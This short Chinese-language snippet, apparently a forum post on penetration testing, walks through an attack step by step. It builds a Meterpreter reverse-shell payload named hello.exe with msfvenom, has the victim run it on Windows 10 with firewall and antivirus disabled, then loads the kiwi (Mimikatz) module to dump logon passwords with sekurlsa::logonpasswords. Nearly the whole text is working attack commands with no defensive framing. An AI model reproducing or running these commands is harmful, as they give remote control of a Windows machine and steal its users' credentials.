生成被控端hello.exe
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.64.146 lport=22222 -f exe -o /home/kali/Desktop/hello.exe
复制代码
开始监听:
把被控端移动到windows10系统下,关闭防火墙和杀毒后,运行,即可得到meterpreter
执行命令 load -l ,查看可载入模块。
载入 load kiwi
执行:kiwi_cmd privilege::debug
执行:kiwi_cmd sekurlsa::logonpasswords
|